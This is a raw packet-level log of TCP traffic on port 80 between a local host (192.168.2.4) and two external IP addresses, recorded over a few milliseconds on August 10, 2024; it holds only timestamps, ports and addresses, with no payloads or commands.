Aug 10, 2024 16:12:22.740603924 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.740611076 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740633011 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.740645885 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.741240978 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741251945 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741261005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741271973 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741281986 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.741282940 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741293907 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741313934 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.741328955 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.741399050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741410971 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.741447926 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.742168903 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742181063 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742189884 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742211103 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.742227077 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.742326975 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742340088 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742345095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742351055 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.742372036 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.742404938 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743019104 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743031979 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743041039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743052006 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743061066 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743065119 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743076086 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743083000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743087053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743099928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743128061 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743891954 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743904114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743913889 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743925095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743936062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.743940115 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743963003 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.743978977 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744050980 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744061947 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744071007 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744096041 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744112968 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744585991 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744628906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744739056 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744750977 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744761944 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744771957 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744782925 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744782925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744795084 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.744811058 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.744828939 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.745487928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745500088 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745508909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745520115 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745529890 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745534897 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.745543003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745554924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.745563984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.745573997 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.745594978 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.752784014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.752845049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.752898932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.752912045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.752949953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.753123999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.753170967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.760773897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.760839939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.760910988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.760926008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761070013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761080980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761090994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761111975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761142969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761260986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761308908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761420012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761430979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761441946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761454105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.761461973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761477947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.761503935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762001991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762051105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762126923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762137890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762147903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762159109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762167931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762181044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762186050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762207985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762234926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762687922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762734890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762840986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762851000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762861013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762866974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762875080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762887955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.762895107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.762917042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.763293028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.763304949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.763314962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.763340950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.763348103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.763456106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.763477087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.763500929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.763513088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.764049053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764060020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764070034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764081001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764092922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.764121056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.764225006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764239073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764250994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764262915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.764271021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.764312029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.764338017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765022039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765033007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765043020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765054941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765068054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765083075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765091896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765091896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765140057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765140057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765186071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765275002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765928030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765940905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765949965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765963078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765974998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.765999079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.765999079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.766026974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.766077042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766091108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766103983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766118050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766143084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.766185045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.766788960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766801119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766946077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.766954899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766964912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766974926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766985893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766998053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.766999960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767011881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767059088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767059088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767817020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767828941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767838001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767848969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767860889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767873049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767883062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767883062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767888069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.767920017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767940044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.767940044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.768716097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768727064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768735886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768759012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.768764973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768775940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768783092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.768791914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768805981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.768829107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.768857956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768870115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.768902063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.769644976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769655943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769665956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769676924 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769687891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.769695044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769702911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.769717932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769754887 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.769782066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.769807100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769829035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.769876957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.770441055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770453930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770462990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770474911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770488024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770497084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.770503044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770517111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770529985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.770551920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.770555973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.770601988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.770668030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771270990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771334887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771467924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771478891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771487951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771502018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771511078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771523952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771539927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771553040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771568060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771593094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771606922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771637917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771657944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771668911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771677017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771688938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771701097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771712065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771712065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771719933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771733999 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771742105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771755934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771768093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771771908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771771908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771780968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771789074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771795034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771810055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771821976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771840096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771840096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771847010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771856070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771868944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771888018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771894932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771914005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.771920919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771940947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771949053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.771965981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772010088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772039890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772052050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772308111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772320032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772330999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772344112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772351980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772361040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772372961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772378922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772386074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772394896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772406101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.772413015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772425890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.772440910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773176908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773189068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773197889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773210049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773220062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773228884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773240089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773247957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773262978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773283958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773791075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773802996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.773830891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.773843050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.774715900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.774766922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.774904013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.774951935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.775089025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775134087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.775233984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775278091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.775378942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775391102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775424004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.775582075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775593996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.775639057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778459072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778470993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778511047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778589964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778604984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778615952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778628111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778635979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778646946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778654099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778664112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778677940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778687000 CEST	49739	80	192.168.2.4	147.45.44.104
